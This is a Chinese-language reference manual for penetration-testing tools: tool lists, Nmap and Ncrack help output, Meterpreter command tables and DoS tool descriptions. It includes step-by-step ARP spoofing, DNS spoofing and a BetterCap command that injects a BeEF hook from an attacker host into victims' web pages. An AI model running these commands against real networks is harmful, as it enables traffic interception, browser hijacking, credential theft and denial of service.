Hack Tools 参考手册

本文档为常见黑客工具的使用手册。阅读时需要有一定的网络、Linux、Windows ... 基础知识。

dig nslookup whois bettercap

目录

介绍

目录

信息收集 (Information Gathering)

acccheck

ace-voip

amap

automater

bing-ip2hosts

braa

casefile

cdpsnarf

cisco-torch

copy-router-config

dmitry

dnmap

dnsenum

dnsmap

dnsrecon

dnstracer

dnswalk

dotdotpwn

enum4linux

enumiax

exploitdb

fierce

firewalk

fragroute

fragrouter

ghost-phisher

golismero

goofile

hping3

intrace

ismtp

lbd

maltego-teeth

masscan

metagoofil

miranda

Nmap

root@kali:~# nmap -h
Nmap 6.00 ( http://nmap.org )
Usage: nmap [Scan Type(s)] [Options] {target specification}
TARGET SPECIFICATION:
  Can pass hostnames, IP addresses, networks, etc.
  Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254
  -iL <inputfilename>: Input from list of hosts/networks
  -iR <num hosts>: Choose random targets
  --exclude <host1[,host2][,host3],...>: Exclude hosts/networks
  --excludefile <exclude_file>: Exclude list from file
HOST DISCOVERY:
  -sL: List Scan - simply list targets to scan
  -sn: Ping Scan - disable port scan
  -Pn: Treat all hosts as online -- skip host discovery
  -PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports
  -PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes
  -PO[protocol list]: IP Protocol Ping
  -n/-R: Never do DNS resolution/Always resolve [default: sometimes]
  --dns-servers <serv1[,serv2],...>: Specify custom DNS servers
  --system-dns: Use OS's DNS resolver
  --traceroute: Trace hop path to each host
SCAN TECHNIQUES:
  -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
  -sU: UDP Scan
  -sN/sF/sX: TCP Null, FIN, and Xmas scans
  --scanflags <flags>: Customize TCP scan flags
  -sI <zombie host[:probeport]>: Idle scan
  -sY/sZ: SCTP INIT/COOKIE-ECHO scans
  -sO: IP protocol scan
  -b <FTP relay host>: FTP bounce scan
PORT SPECIFICATION AND SCAN ORDER:
  -p <port ranges>: Only scan specified ports
    Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080,S:9
  -F: Fast mode - Scan fewer ports than the default scan
  -r: Scan ports consecutively - don't randomize
  --top-ports <number>: Scan <number> most common ports
  --port-ratio <ratio>: Scan ports more common than <ratio>
SERVICE/VERSION DETECTION:
  -sV: Probe open ports to determine service/version info
  --version-intensity <level>: Set from 0 (light) to 9 (try all probes)
  --version-light: Limit to most likely probes (intensity 2)
  --version-all: Try every single probe (intensity 9)
  --version-trace: Show detailed version scan activity (for debugging)
SCRIPT SCAN:
  -sC: equivalent to --script=default
  --script=<Lua scripts>: <Lua scripts> is a comma separated list of
           directories, script-files or script-categories
  --script-args=<n1=v1,[n2=v2,...]>: provide arguments to scripts
  --script-args-file=filename: provide NSE script args in a file
  --script-trace: Show all data sent and received
  --script-updatedb: Update the script database.
  --script-help=<Lua scripts>: Show help about scripts.
           <Lua scripts> is a comma separted list of script-files or
           script-categories.
OS DETECTION:
  -O: Enable OS detection
  --osscan-limit: Limit OS detection to promising targets
  --osscan-guess: Guess OS more aggressively
TIMING AND PERFORMANCE:
  Options which take <time> are in seconds, or append 'ms' (milliseconds),
  's' (seconds), 'm' (minutes), or 'h' (hours) to the value (e.g. 30m).
  -T<0-5>: Set timing template (higher is faster)
  --min-hostgroup/max-hostgroup <size>: Parallel host scan group sizes
  --min-parallelism/max-parallelism <numprobes>: Probe parallelization
  --min-rtt-timeout/max-rtt-timeout/initial-rtt-timeout <time>: Specifies
      probe round trip time.
  --max-retries <tries>: Caps number of port scan probe retransmissions.
  --host-timeout <time>: Give up on target after this long
  --scan-delay/--max-scan-delay <time>: Adjust delay between probes
  --min-rate <number>: Send packets no slower than <number> per second
  --max-rate <number>: Send packets no faster than <number> per second
FIREWALL/IDS EVASION AND SPOOFING:
  -f; --mtu <val>: fragment packets (optionally w/given MTU)
  -D <decoy1,decoy2[,ME],...>: Cloak a scan with decoys
  -S <IP_Address>: Spoof source address
  -e <iface>: Use specified interface
  -g/--source-port <portnum>: Use given port number
  --data-length <num>: Append random data to sent packets
  --ip-options <options>: Send packets with specified ip options
  --ttl <val>: Set IP time-to-live field
  --spoof-mac <mac address/prefix/vendor name>: Spoof your MAC address
  --badsum: Send packets with a bogus TCP/UDP/SCTP checksum
OUTPUT:
  -oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3,
     and Grepable format, respectively, to the given filename.
  -oA <basename>: Output in the three major formats at once
  -v: Increase verbosity level (use -vv or more for greater effect)
  -d: Increase debugging level (use -dd or more for greater effect)
  --reason: Display the reason a port is in a particular state
  --open: Only show open (or possibly open) ports
  --packet-trace: Show all packets sent and received
  --iflist: Print host interfaces and routes (for debugging)
  --log-errors: Log errors/warnings to the normal-format output file
  --append-output: Append to rather than clobber specified output files
  --resume <filename>: Resume an aborted scan
  --stylesheet <path/URL>: XSL stylesheet to transform XML output to HTML
  --webxml: Reference stylesheet from Nmap.Org for more portable XML
  --no-stylesheet: Prevent associating of XSL stylesheet w/XML output
MISC:
  -6: Enable IPv6 scanning
  -A: Enable OS detection, version detection, script scanning, and traceroute
  --datadir <dirname>: Specify custom Nmap data file location
  --send-eth/--send-ip: Send using raw ethernet frames or IP packets
  --privileged: Assume that the user is fully privileged
  --unprivileged: Assume the user lacks raw socket privileges
  -V: Print version number
  -h: Print this help summary page.
EXAMPLES:
  nmap -v -A scanme.nmap.org
  nmap -v -sn 192.168.0.0/16 10.0.0.0/8
  nmap -v -iR 10000 -Pn -p 80
SEE THE MAN PAGE (http://nmap.org/book/man.html) FOR MORE OPTIONS AND EXAMPLES

ntop

p0f

parsero

recon-ng

set

smtp-user-enum

snmpcheck

sslcaudit

sslsplit

sslstrip

sslyze

thc-ipv6

theharvester

tlssled

twofi

urlcrazy

Wireshark

wol-e

xplico

漏洞分析 (Vulnerability Analysis)

bbqsql

bed

cisco-auditing-tool

cisco-global-exploiter

cisco-ocs

dbpwaudit

doona

greenbone-security-assistant

gsd

hexorbase

inguma

jsql

lynis

ohrwurm

openvas-administrator

openvas-cli

openvas-manager

openvas-scanner

oscanner

powerfuzzer

sfuzz

sidguesser

siparmyknife

SQLmap

sqlninja

sqlsus

tnscmd10g

unix-privesc-check

yersinia

无线攻击 (Wireless Attacks)

Aircrack-ng

asleap

bluelog

bluemaho

bluepot

blueranger

bluesnarfer

bully

cowpatty

crackle

eapmd5pass

fern-wifi-cracker

giskismet

gqrx

gr-scan

kalibrate-rtl

killerbee

Kismet

mdk3

mfcuk

mfoc

mfterm

multimon-ng

pixiewps

reaver

redfang

rtlsdr-scanner

spooftooph

wifi-honey

wifitap

wifite

Web 应用程序 (Web Applications)

apache-users

arachni

blindelephant

Burp Suite

cutycapt

davtest

deblaze

dirb

dirbuster

fimap

funkload

grabber

jboss-autopwn

joomscan

padbuster

paros

plecost

proxystrike

skipfish

ua-tester

uniscan

vega

W3af

webscarab

webshag

webslayer

websploit

wfuzz

wpscan

xsser

zaproxy

开发工具 (Exploitation Tools)

armitage

backdoor-factory

BeEF

commix

linux-exploit-suggester

shellnoob

取证工具 (Forensics Tools)

bulk-extractor

capstone

chntpw

cuckoo

dc3dd

ddrescue

dff

distorm3

dumpzilla

extundelete

foremost

galleta

guymager

iphone-backup-analyzer

pdf-parser

pdfid

pdgmail

peepdf

regripper

volatility

压力测试 (Stress Testing)

dhcpig

iaxflood

inundator

inviteflood

ipv6-toolkit

rtpflood

slowhttptest

t50

termineter

thc-ssl-dos

嗅探和欺骗 (Sniffing & Spoofing)

dnschef

fiked

hamster-sidejack

hexinject

isr-evilgrade

MITMProxy

protos-sip

rebind

responder

rtpbreak

rtpinsertsound

rtpmixsound

sctpscan

sipp

sipvicious

sniffjoke

voiphopper

xspy

密码攻击 (Password Attacks)

cewl

cmospwd

creddump

crunch

findmyhash

gpp-decrypt

hash-identifier

THC Hydra

john-the-ripper

johnny

keimpx

maskprocessor

multiforcer

Ncrack

Ncrack 是一个高速的网络认证破解工具。 Ncrack 采用模块化方法,类似的 Nmap 命令行语法和动态引擎,可以根据网络的反馈调整其行为而设计的。 它允许多个主机的快速而可靠的大规模审计。

Ncrack的功能包括一个非常灵活的接口授予网络操作的用户的完全控制,允许非常复杂的暴力破解攻击, 定时模板为便于使用的,类似的Nmap的并有更多的运行时的交互。 支持的协议包括:RDP、SSH、http(s)、SMB、pop3(s)、VNC、FTP、telnet.

root@kali:~# ncrack -h
Ncrack 0.4ALPHA ( http://ncrack.org )
Usage: ncrack [Options] {target and service specification}
TARGET SPECIFICATION:
  Can pass hostnames, IP addresses, networks, etc.
  Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254
  -iX <inputfilename>: Input from Nmap's -oX XML output format
  -iN <inputfilename>: Input from Nmap's -oN Normal output format
  -iL <inputfilename>: Input from list of hosts/networks
  --exclude <host1[,host2][,host3],...>: Exclude hosts/networks
  --excludefile <exclude_file>: Exclude list from file
SERVICE SPECIFICATION:
  Can pass target specific services in <service>://target (standard) notation or
  using -p which will be applied to all hosts in non-standard notation.
  Service arguments can be specified to be host-specific, type of service-specific
  (-m) or global (-g). Ex: ssh://10.0.0.10,at=10,cl=30 -m ssh:at=50 -g cd=3000
  Ex2: ncrack -p ssh,ftp:3500,25 10.0.0.10 scanme.nmap.org google.com:80,ssl
  -p <service-list>: services will be applied to all non-standard notation hosts
  -m <service>:<options>: options will be applied to all services of this type
  -g <options>: options will be applied to every service globally
  Misc options:
    ssl: enable SSL over this service
    path <name>: used in modules like HTTP ('=' needs escaping if used)
TIMING AND PERFORMANCE:
  Options which take <time> are in seconds, unless you append 'ms'
  (miliseconds), 'm' (minutes), or 'h' (hours) to the value (e.g. 30m).
  Service-specific options:
    cl (min connection limit): minimum number of concurrent parallel connections
    CL (max connection limit): maximum number of concurrent parallel connections
    at (authentication tries): authentication attempts per connection
    cd (connection delay): delay <time> between each connection initiation
    cr (connection retries): caps number of service connection attempts
    to (time-out): maximum cracking <time> for service, regardless of success so far
  -T<0-5>: Set timing template (higher is faster)
  --connection-limit <number>: threshold for total concurrent connections
AUTHENTICATION:
  -U <filename>: username file
  -P <filename>: password file
  --user <username_list>: comma-separated username list
  --pass <password_list>: comma-separated password list
  --passwords-first: Iterate password list for each username. Default is opposite.
OUTPUT:
  -oN/-oX <file>: Output scan in normal and XML format, respectively, to the given filename.
  -oA <basename>: Output in the two major formats at once
  -v: Increase verbosity level (use twice or more for greater effect)
  -d[level]: Set or increase debugging level (Up to 10 is meaningful)
  --nsock-trace <level>: Set nsock trace level (Valid range: 0 - 10)
  --log-errors: Log errors/warnings to the normal-format output file
  --append-output: Append to rather than clobber specified output files
MISC:
  --resume <file>: Continue previously saved session
  -f: quit cracking service after one found credential
  -6: Enable IPv6 cracking
  -sL or --list: only list hosts and services
  --datadir <dirname>: Specify custom Ncrack data file location
  -V: Print version number
  -h: Print this help summary page.
MODULES:
  FTP, SSH, TELNET, HTTP(S), POP3(S), SMB, RDP, VNC
EXAMPLES:
  ncrack -v --user root localhost:22
  ncrack -v -T5 https://192.168.0.1
  ncrack -v -iX ~/nmap.xml -g CL=5,to=1h
SEE THE MAN PAGE (http://nmap.org/ncrack/man.html) FOR MORE OPTIONS AND EXAMPLES

oclgausscrack

pack

patator

phrasendrescher

polenum

rainbowcrack

rcracki-mt

rsmangler

sqldict

statsprocessor

thc-pptp-bruter

truecrack

wordlists

维护访问 (Maintaining Access)

cryptcat

cymothoa

dbd

dns2tcp

http-tunnel

httptunnel

intersect

nishang

powersploit

pwnat

ridenum

sbd

u3-pwn

webshells

weevely

winexe

逆向工程 (Reverse Engineering)

apktool

dex2jar

edb-debugger

jad

javasnoop

jd-gui

ollydbg

smali

valgrind

yara

硬件黑客 (Hardware Hacking)

Android SDK

arduino

sakis3g

报告工具 (Reporting Tools)

dos2unix

dradis

keepnote

magictree

nipper-ng

pipal

Arpspoof

开启IP转发

echo 1 >> /proc/sys/net/ipv4/ip_forward

查看网段信息

ip a

对被攻击者进行 ARP 欺骗

arpspoof -i eth0 -t 192.168.1.103 192.168.1.1

查看 ARP 映射表

arp -a

Dnsspoof

Angry IP Scanner

BetterCap

BetterCap 是中间人攻击中的一种工具,用于替代知名但老旧的 Ettercap

一些主要功能包括:

  • 全双工和半双工 ARP 欺诈
  • 真正的 ICMP DoubleDirect 欺诈实现
  • 配置 DNS 欺诈
  • 实时和完全的 automatized 主机发现
  • 实时的认证证书协议的捕获,如 HTTP(S) 发布的数据,基本和数字认证 FTP, IRC, POP, IMAP, SMTP, NTLM ( HTTP, SMB, LDAP, etc ) 等等
  • 完全自定义的网络嗅探器
  • 模块化的 HTTP 和用户插件 + 内置插件注入自定义的 HTML 代码,JS 或 CSS 文件和 URL 支持的 HTTPS 透明代理
  • SSLStripping
  • 内置 HTTP 服务器

安装

BetterCap 是 Ruby编写的,这意味着你将需要一个Ruby解释器 (> = 1.9),并安装了 RubyGems 的环境

稳定版本 (GEM)

使用 gem install 轻松安装:

gem install bettercap

更新到新版本:

gem update bettercap

依赖

所有的依赖性将通过 GEM 系统自动安装,在某些情况下,你可能需要自己安装这些本地的依赖性:

apt-get install build-essential ruby-dev libpcap-dev

开发版本

开发版本是最新的版本,你也可以从克隆GitHub的库的源代码, 这会给你所有最新和实验功能,但请记住,您使用的是潜在的不稳定版本:

git clone https://github.com/evilsocket/bettercap.git
cd bettercap
bundle install
gem build bettercap.gemspec
sudo gem install bettercap*.gem

网络欺骗

你可以针对整个局域网或单个目标

选项

-S, --spoofer NAME

欺骗者模块来使用,可得:ARP,ICMP,NONE,如果没有欺骗程序指定的默认​​(ARP)将被选择

-T, --target ADDRESS1,ADDRESS2,...

针对指定的目标 IP 或 MAC 地址,在没有指定完整的子网情况下

--ignore ADDRESS1,ADDRESS2

忽略指定的某些地址

--dns FILE

启用 DNS 欺骗服务器,并指定一个文件作为一个主机解析表

--dns-port PORT

设置 DNS 服务器的端口,默认为 5300

--kill

相反,转发数据包,这种交换机会将目标的连接被杀害。

--no-spoofing

禁止欺骗,别名 --spoofer NONE

--half-duplex

启用半双工中间人,这将使 bettercap 工作在这种情况下,当路由器不容易(见下文)

DNS 欺骗

如果要执行DNS欺骗,你必须指定 --dns FILE 命令行参数,这里的 FILE

是由类似下面的条目组成文件的名称:

# Empty lines or lines starting with # will be ignored.

# redirect *.google.com to the attacker ip address

local .*google\.com

# redirect *.microsoft.com to 10.10.10.10

10.10.10.10 .*microsoft\.com

例子

在一个局域网中启动时默认使用 ARP 欺诈方式:

bettercap
bettercap -S ICMP
bettercap --dns ./hosts --httpd-port 80

组合 BeEF 框架使用

在中间人攻击中对目标主机访问的每个网页中注入 BeEFhook.js 使之可被 BeEF 控制。

启动 BeEF 框架

cd /opt/beef-xss
./beef

记下你的 Hook URL (http://192.168.1.101:3000/hook.js)

打开另一个终端,启动 BetterCap (注意:替换成你的URL)

bettercap --proxy-module injectjs --js-url "http://192.168.1.101:3000/hook.js"

如果你需要指定一个特定的目标,使用 -T 参数

bettercap -T 192.168.1.102 --proxy-module injectjs --js-url "http://192.168.1.101:3000/hook.js"

BetterCap 将开始欺骗目标,将 JavaScript 注入到目标主机访问的每一个网页上

现在打开你的浏览器,登录到 BeEF 的控制台 (http://192.168.1.101:3000/ui/panel) ,如果一切正常,你应该能看到被控制的目标浏览器。

BurpKit

Cain & Abel

Dig

dig (Domain Information Groper) 是个常用的域名查询工具。dig 的功能比 nslookup 更强大。

用法

dig 基本的用法

dig www.exmaple.com
; <<>> DiG 9.8.4-rpz2+rl005.12-P1 <<>> www.exmaple.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 63806
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 4, ADDITIONAL: 7

;; QUESTION SECTION:
;www.exmaple.com.               IN      A

;; ANSWER SECTION:
www.exmaple.com.        86400   IN      A       85.119.83.248    // 主机名对应的 IP 地址

;; AUTHORITY SECTION:
exmaple.com.            86365   IN      NS      a.authns.bitfolk.co.uk.
exmaple.com.            86365   IN      NS      c.authns.bitfolk.com.
exmaple.com.            86365   IN      NS      b.authns.bitfolk.com.
exmaple.com.            86365   IN      NS      numpty.absolutelyplastered.com.

;; ADDITIONAL SECTION:
a.authns.bitfolk.co.uk. 172800  IN      A       85.119.80.222
a.authns.bitfolk.co.uk. 172800  IN      AAAA    2001:ba8:1f1:f019::53
b.authns.bitfolk.com.   172764  IN      A       174.136.109.67
b.authns.bitfolk.com.   172764  IN      AAAA    2607:f2f8:a104::53
c.authns.bitfolk.com.   172764  IN      A       173.255.227.192
c.authns.bitfolk.com.   172764  IN      AAAA    2600:3c03::31:2053
numpty.absolutelyplastered.com. 172764 IN A     85.119.82.19

;; Query time: 255 msec
;; SERVER: 192.168.1.1#53(192.168.1.1)
;; WHEN: Mon Feb 22 21:27:01 2016
;; MSG SIZE  rcvd: 321

Driftnet

使用

语法: driftnet [options] [filter code]

主要参数

-b 捕获到新的图片时发出嘟嘟声
-i interface 选择监听接口
-f file 读取一个指定pcap数据包中的图片
-p 不让所监听的接口使用混杂模式
-a 后台模式:将捕获的图片保存到目录中(不会显示在屏幕上)
-m number 指定保存图片数的数目
-d directory 指定保存图片的路径
-x prefix 指定保存图片的前缀名

使用举例

1.实时监听: driftnet -i wlan0

2.读取一个指定pcap数据包中的图片: driftnet -f /home/linger/backup/ap.pcapng -a -d /root/drifnet/

Ettercap

High Orbit Ion Cannon

High Orbit Ion Cannon 是一款 DoS 攻击工具。

特征

  • 高速多线程 HTTP 洪水攻击
  • 同一时间对一个网站洪水攻击高达256次
  • 内置的脚本系统,以便部署 “boosters” 。脚本旨在对抗 DDoS 攻击的防御对策和提高产量的 DoS 部署。
  • 易于使用的界面
  • 可以移植到 Linux/Mac 有一些bug待修复(我没有这些系统)
  • 能在攻击时选择线程数
  • 能够设置攻击级别:低,中,高

Hping

John the Ripper

Low Orbit Ion Canon

Metaspoilt

Metasploit

使用

Core Commands

Command Description
? 帮助菜单
background 将当前会话移动到背景
bgkill 杀死一个背景 meterpreter 脚本
bglist 提供所有正在运行的后台脚本的列表
bgrun 作为一个后台线程运行脚本
channel 显示活动频道
close 关闭通道
exit 终止 meterpreter 会话
help 帮助菜单
interact 与通道进行交互
irb 进入 Ruby 脚本模式
migrate 移动到一个指定的 PID 的活动进程
quit 终止 meterpreter 会话
read 从通道读取数据
run 执行以后它选定的 meterpreter 脚本
use 加载 meterpreter 的扩展
write 将数据写入到一个通道

文件系统命令

Command Description
cat 读取并输出到标准输出文件的内容
cd 更改目录对受害人
del 删除文件对受害人
download 从受害者系统文件下载
edit 用 vim编辑文件
getlwd 打印本地目录
getwd 打印工作目录
lcd 更改本地目录
lpwd 打印本地目录
ls 列出在当前目录中的文件列表
mkdir 在受害者系统上的创建目录
pwd 输出工作目录
rm 删除文件
rmdir 受害者系统上删除目录
upload 从攻击者的系统往受害者系统上传文件

网络命令

Command Description
ipconfig 显示网络接口的关键信息,包括 IP 地址、 等。
portfwd 端口转发
route 查看或修改受害者路由表

系统命令

Command Description
clearav 清除了受害者的计算机上的事件日志
drop_token 被盗的令牌
execute 执行命令
getpid 获取当前进程 ID (PID)
getprivs 尽可能获取尽可能多的特权
getuid 获取作为运行服务器的用户
kill 终止指定 PID 的进程
ps 列出正在运行的进程
reboot 重新启动受害人的计算机
reg 与受害人的注册表进行交互
rev2self 在受害者机器上调用 RevertToSelf()
shell 在受害者计算机上打开一个shell
shutdown 关闭了受害者的计算机
steal_token 试图窃取指定的 (PID) 进程的令牌
sysinfo 获取有关受害者计算机操作系统和名称等的详细信息

用户界面命令

Command Description
enumdesktops 列出所有可访问台式机
getdesktop 获取当前的 meterpreter 桌面
idletime 检查长时间以来,受害者系统空闲进程
keyscan_dump 键盘记录软件的内容转储
keyscan_start 启动时与如 Word 或浏览器的进程相关联的键盘记录软件
keyscan_stop 停止键盘记录软件
screenshot 抓去 meterpreter 桌面的屏幕截图
set_desktop 更改 meterpreter 桌面
uictl 启用用户界面组件的一些控件

特权升级命令

Command Description
getsystem 获得系统管理员权限

密码转储命令

Command Description
hashdump 抓去哈希密码 (SAM) 文件中的值

Timestomp 命令

Command Description
timestomp 操作修改,访问,并创建一个文件的属性

Nessus

Netcat

Nikto

NoSQLMap

NoSQLMap 是一款开源 Python 工具,可以帮助安全测试人员自动化对 NoSQL 数据库进行攻击测试。 目前这款工具的漏洞利用程序围绕 MongoDB,但是以后会支持更多的 NoSQL 数据库,如:CouchDB、Redis、Cassandra。

安装

要求

在一个基于 Debian 或 Red Hat 系统,setup 脚本可能会以 root 身份来自动安装 NoSqlMap 的依赖

根据使用的功能有所不同:

  • Metasploit Framework
  • Python 和 PyMongo
  • httplib2
  • urllib
  • 一个本地默认MongoDB实例对数据库进行复制。点击 这里 查看安装说明。

编译安装

git clone https://github.com/tcstool/NoSQLMap.git
cd NoSQLMap
python setup.py install

用法

启动 NoSQLMap

./nosqlmap.py

当打开 NoSQLMap 时你会看到主菜单:

1-Set options (do this first)               // 1-设置选项(第一步操作)
2-NoSQL DB Access Attacks           // 2-NoSQL DB 访问攻击
3-NoSQL Web App attacks             // 3-NoSQL Web应用攻击
4-Scan for Anonymous MongoDB Access         // 4-扫描匿名 MongoDB 访问
x-Exit              // x-退出

菜单说明

1.设置目标 host/host/IP 目标 Web 服务器 如:(www.google.com) 或者任何你想要攻击的 MongoDB 服务器。
2.设置 Web 应用 port-TCP 如果一个 Web 应用成为目标,为 Web 应用设置 TCP 端口。
3.设置 URI 路径,部分 URI 包含页面名称及任何非主机名称的参数 如:(/app/acct.php?acctid=102)。
4.设置 HTTP 请求方法 (GET/POST) 设置请求方法为 GET 或 POST ;现在只能使用 GET 方法但是后续会增加 POST 方法。
5.设置我的本地 Mongo/Shell IP-Set 如果直接攻击一个 MongoDB 实例,设置这个选项到目标 Mongo 安装的IP来复制受害者服务器或打开 Meterpreter Shell。
6.设置 Shell 监听端口,如果开放 Meterpreter Shell 就会指定端口。
7.加载选项 file-Load 加载之前保存的 1-6 中的设置。
8.加载选项 从 Burp 保存的 (request-Parse) 请求中加载 Burp Suite 的请求,并填充 Web 应用选项。、
9.保存选项设置 file-Save 保存 1-6 中的设置以便未来使用。
x.返回主菜单 meun-Use 使用这个选项开始攻击。

演示视频

MongoDB 中的 SqlMap 管理攻击演示

Nslookup

OpenVAS

OWASP HTTP Post Tool

OWASP HTTP Post Tool 是用于测试 Web 应用程序的可靠性,性能和容量规划服务的工具。

OWASP弹簧刀提供了3种不同类型的测试方式:SSL连接半、HTTP POST 攻击、Slowloris。

Ping

ping 是个网络测试命令,用于测试网络的联通性,几乎所有所有操作系统都自带。

Linux

用法

ping [参数] [IP地址或主机名]
ping [-LRUbdfnqrvVaAD] [-c count] [-i interval] [-w deadline]
     [-p pattern] [-s packetsize] [-t ttl] [-I interface]
     [-M pmtudisc-hint] [-m mark] [-S sndbuf]
     [-T tstamp-options] [-Q tos] [hop1 ...] destination

参数

-d     使用Socket的SO_DEBUG功能。
-f     极限检测。大量且快速地送网络封包给一台机器,看它的回应。
-n     只输出数值。
-q     不显示任何传送封包的信息,只显示最后的结果。
-r     忽略普通的Routing Table,直接将数据包送到远端主机上。通常是查看本机的网络接口是否有问题。
-R     记录路由过程。
-v     详细显示指令的执行过程。
<p>-c  数目:在发送指定数目的包后停止。
-i     秒数:设定间隔几秒送一个网络封包给一台机器,预设值是一秒送一次。
-I     网络界面:使用指定的网络界面送出数据包。
-l     前置载入:设置在送出要求信息之前,先行发出的数据包。
-p     范本样式:设置填满数据包的范本样式。
-s     字节数:指定发送的数据字节数,预设值是56,加上8字节的ICMP头,一共是64ICMP数据字节。
-t     存活数值:设置存活数值TTL的大小。

Windows

用法

ping [选项] [IP地址或主机名]
ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
            [-r count] [-s count] [[-j host-list] | [-k host-list]]
            [-w timeout] [-R] [-S srcaddr] [-c compartment] [-p]
            [-4] [-6] target_name

选项

-t             Ping 指定的主机,直到停止。
               若要查看统计信息并继续操作,请键入 Ctrl+Break;
               若要停止,请键入 Ctrl+C。
-a             将地址解析为主机名。
-n count       要发送的回显请求数。
-l size        发送缓冲区大小。
-f             在数据包中设置“不分段”标记(仅适用于 IPv4)。
-i TTL         生存时间。
-v TOS         服务类型(仅适用于 IPv4。该设置已被弃用,
               对 IP 标头中的服务类型字段没有任何
               影响)。
-r count       记录计数跃点的路由(仅适用于 IPv4)。
-s count       计数跃点的时间戳(仅适用于 IPv4)。
-j host-list   与主机列表一起使用的松散源路由(仅适用于 IPv4)。
-k host-list   与主机列表一起使用的严格源路由(仅适用于 IPv4)。
-w timeout     等待每次回复的超时时间(毫秒)。
-R             同样使用路由标头测试反向路由(仅适用于 IPv6)。
               根据 RFC 5095,已弃用此路由标头。
               如果使用此标头,某些系统可能丢弃
               回显请求。
-S srcaddr     要使用的源地址。
-c compartment 路由隔离舱标识符。
-p             Ping Hyper-V 网络虚拟化提供程序地址。
-4             强制使用 IPv4。
-6             强制使用 IPv6。
target_name    IP地址或域名。

PyLoris

PyLoris 是用于测试服务器漏洞,进行连接耗尽性能拒绝服务的 DoS 攻击可脚本工具。 PyLoris 可以利用 SOCKS 代理和 SSL 连接,并且可以指定协议,如:HTTP、FTP、SMTP、IMAP、Telnet。

特性

  • Tkinter GUI
  • Scripting API
  • Anonymity
  • TOR Proxying
  • SOCKS Proxying

Sandcat Browser

Sandcat Browser 是一款便携的渗透测试专用浏览器,基于Google Chrome内核。 免费、方便携带、主要用做渗透测试并且支持多标签。 包含了许多安全扩展插件,以扩展和脚本的形式打造渗透测试工具包。

Scapy

Snort

TCPdump

Tor’s Hammer

Tor’s Hammer 是用 Python 写的 DOS 测试工具。它也可以通过 Tor 网络运行进行匿名。 如果你想使用 Tor 运行,需安装TOR并监听于 127.0.0.1:9050 。 攻击通过单一实例上运行 Apache 和 IIS 最不受保护的 Web 服务器。

使用

启动 Tor’s Hammer

./torshammer.py

帮助信息:

/*
 * Tor's Hammer
 * Slow POST DoS Testing Tool
 * Version 1.0 Beta
 * Anon-ymized via Tor
 * We are Anonymous.
 * We are Legion.
 * We do not forgive.
 * We do not forget.
 * Expect us!
 */

./torshammer.py -t <target> [-r <threads> -p <port> -T -h]
 -t|--target <Hostname|IP>
 -r|--threads <Number of threads> Defaults to 256
 -p|--port <Web Server Port> Defaults to 80
 -T|--tor Enable anonymising through tor on 127.0.0.1:9050
 -h|--help Shows this help

Eg. ./torshammer.py -t 192.168.1.100 -r 256

Whois

XOIC

XOIC 是一个 DoS 攻击工具。 有关DoS攻击的更多信息:http://de.wikipedia.org/wiki/Denial_of_Service 该工具可对任何IP地址进行 (D)DoS 攻击,用户可以自己指定的特定的端口和协议。

使用

XOIC 有3种模式:

  • 测试模式
  • 普通 DoS 攻击模式 (无请求计数器,因为 TCP UDP HTTP ICMP 消息性能)
  • DoS 攻击使用 TCP/HTTP/UDP/ICMP 消息

Zmap